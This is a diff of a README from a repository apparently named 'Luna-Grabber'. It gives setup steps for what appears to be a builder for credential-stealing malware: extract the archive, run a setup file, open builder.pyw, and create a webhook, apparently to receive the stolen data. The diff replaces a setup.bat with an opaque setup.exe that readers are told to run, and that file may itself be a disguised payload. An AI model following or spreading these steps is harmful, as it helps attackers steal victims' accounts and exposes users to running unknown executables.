Smugg246/Luna-Grabber/README.md

 ```
 Once you've downloaded the files extract the folder so it's no longer a .zip file.
 ```
-### 3. Open The setup.bat File:
+### 3. Open The setup.exe File:

 ```
-You dont need to install any modules opening setup.bat will install them for you.
+You dont need to install any modules opening setup.exe will install them for you.
 Then you can open the builder.pyw file which will
 open the gui.
 ```
 ### 4. Create A Webhook: